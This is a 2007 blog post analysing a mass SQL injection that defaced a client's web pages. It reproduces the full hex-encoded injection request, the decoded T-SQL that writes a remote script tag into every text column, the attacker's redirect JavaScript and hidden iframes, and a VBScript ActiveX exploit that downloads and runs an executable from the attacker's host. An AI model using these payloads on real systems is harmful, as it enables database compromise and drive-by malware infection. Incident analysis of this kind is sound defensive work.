yl18.net: the chinese menace
This is the story of an attack I had to investigate for a client. The synthoms: mass defacement of web pages in the server, the only tool: roughly 1GB of web server log files.
The first step was to find the suspicious requests in the log files. It was reported by the server administrators that strange code had appeared in different pages of the database, and that the string yl18.net was part of the injected data. www.yl18.net (do NOT open in a browser) is a chinese site containing diverse stuff, including porn. 
After come cat, grep and awk it was possible to spot a very suspicious query:
/image.asp?L=85';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x6400650063006C00610072 006500200040006D00200076006100720063006800610072002800380030003000300029003B00730065 007400200040006D003D00270027003B00730065006C00650063007400200040006D003D0040006D002B 0027007500700064006100740065005B0027002B0061002E006E0061006D0065002B0027005D00730065 0074005B0027002B0062002E006E0061006D0065002B0027005D003D0072007400720069006D00280063 006F006E007600650072007400280076006100720063006800610072002C0027002B0062002E006E0061 006D0065002B002700290029002B00270027003C0073006300720069007000740020007300720063003D 00220068007400740070003A002F002F0079006C00310038002E006E00650074002F0030002E006A0073 0022003E003C002F007300630072006900700074003E00270027003B0027002000660072006F006D0020 00640062006F002E007300790073006F0062006A006500630074007300200061002C00640062006F002E 0073007900730063006F006C0075006D006E007300200062002C00640062006F002E0073007900730074 00790070006500730020006300200077006800650072006500200061002E00690064003D0062002E0069 006400200061006E006400200061002E00780074007900700065003D0027005500270061006E00640020 0062002E00780074007900700065003D0063002E0078007400790070006500200061006E006400200063 002E006E0061006D0065003D0027006E00760061007200630068006100720027003B0073006500740020 0040006D003D005200450056004500520053004500280040006D0029003B00730065007400200040006D 003D0073007500620073007400720069006E006700280040006D002C0050004100540049004E00440045 0058002800270025003B00250027002C0040006D0029002C00380030003000300029003B007300650074 00200040006D003D005200450056004500520053004500280040006D0029003B00650078006500630028 0040006D0029003B00%20AS%20NVARCHAR(4000));EXEC(@S);--
Manual testing verified that the L parameter of the image.asp script was indeed vulnerable to SQL injection. Some SQL keywords can be identified in the previous command but there is no doubt that the CAST statement is the most interesting:
Explicitly converts an expression of one data type to another. CAST and CONVERT provide similar functionality.
The syntax for the CAST command is:
CAST ( expression AS data_type [ (length ) ])
A closer look at the injected code reveals that the attack is using CAST to convert hexadecimal data into a string (AS NVARCHAR(4000)).
You can use a tool such as Morf, the ninja encoder to convert the hex data into the following string:
declare @m varchar(8000);
set @m='';
select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+'''';' from dbo.sysobjects
a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and
b.xtype=c.xtype and c.name='varchar'
set @m=REVERSE(@m)
set @m=substring(@m,PATINDEX('%;%',@m),8000);
set @m=REVERSE(@m);
exec(@m);This code adds a malicious script tag to all user table objects which is in line with the behaviour reported by the server administrators.
Lets have a look at the JavaScript code, but be advised, this is not for the weak hearted. 
At the time of the investigation the contents of http://yl18.net/0.js looked like:-
function GetCookie (name) {
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}
function DeleteCookie (name) {
var exp = new Date();
exp.setTime (exp.getTime() - 1);
// This cookie is history
var cval = 0;
document.cookie = name + "=" + cval + "; expires=" + exp.toGMTString();
}
var expDays = 1;
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*8*60*60*1000));
function amt(){
var count = GetCookie('count');
//var count;
//alert(count);
//count = null;
if(count == null) {
SetCookie('count','1')
return 1
}
else{
var newcount = parseInt(count) + 1;
if(newcount<2) count=1;
SetCookie('count',newcount,exp);
//DeleteCookie('count')
return newcount
}
}
function getCookieVal(offset) {
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));
}
function sethome(){
document.write('');
}
if(amt()==1)
{
sethome()
}Bottom line: the sethome() function is executed and a new file is requested: http://www.yl18.net/0.html inside an iframe HTML tag.
The new file contains two sets of instructions as you can see below:-
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=Content-Type content="text/html; charset=big5"> <META content="MSHTML 6.00.2900.3059" name=GENERATOR></HEAD> <BODY> </BODY></HTML> <iframe src="614.htm" height=0 width=0></iframe> <iframe src="Yahoo_.htm" height=0 width=0></iframe> <iframe src="_Opera.htm" height=0 width=0></iframe> <iframe src="614_.htm" height=0 width=0></iframe> <iframe src="_Opera2.htm" height=0 width=0></iframe> <iframe src="a2.html" height=0 width=0></iframe> </BODY></HTML> <script src='http://s93.cnzz.com/stat.php?id=654056&web_id=654056&show=pic1' language='JavaScript' charset='gb2312'></script>
Lets talk first about the last line of the file. A new script tag that points to stat.php with a set of parameters. So our friendly chinese hackers are taking the oportunity not only to infect vulnerable machines but also to add a few clicks to their statistics!
It is a shame that I am not fluent in chinese, however using the prediction powers of the mystical smoking head of ‘Bob’ I was able to find out what page the attackers were voting.
By browsing to http://www.cnzz.com/stat/website.php?web_id=654056 you can identify the following url: http://www.yl18.net/a.htm. This is a nice trick, the attackers were using the clicks provided by the victims of the 0.html page to increase the ranking of a.htm (presumibly another malicious page that will use its clicks to increase the rating of 0.html).
Anyway, back to the other lines of 0.html, 614.htm, Yahoo_.htm, _Opera.htm, 614_.htm, _Opera2.htm and a2.html are all malicious pages that try to exploit different vulnerabilities including the Microsoft ADO DB ActiveX exploit of 2006 and exploits for the Yahoo Bar component. The exploit’s main aim was to download binary files, execute them and install them as resident applications.
It is interesting to note that the Internet Archive tells us that the history of yl18.net attacks dates back to 2005.
One other interesting thing is that at the middle of last week (7th of November 2007), the malicious files in the server were modified. http://yl18.net/0.js was not pointing to 0.html anymore. It pointed instead to a brand new file: EDImage.htm.
The contents of the file were also malicious:-
<object classid='clsid:F685AFD8-A5CC-410E-98E4-BAA1C559BA61' id='test'></object> <script language='vbscript'> On Error Resume Next test.HttpDownloadFile "http://www.yl18.net/0/Install.exe", "c:explorer.exe" </script>
And the interesting bit is that the previous code is that it is exploiting a vulnerability released only five days before, on the 2nd of November by shinnai. As described in the advisory, this code exploits an insecure download method in the EDraw Flowchart ActiveX Control (EDImage.ocx v. 2.0.2005.1104). Vulnerable software: Windows XP Professional SP2 all patched, with Internet Explorer 7. 
So we all better keep an eye on yl18.net because apparently the chinese menace is still evolving.
December 21st, 2007 at 11:35 pm
Hi, I also got that attack on my server on 7th Dec.
I just found that some of my tables have that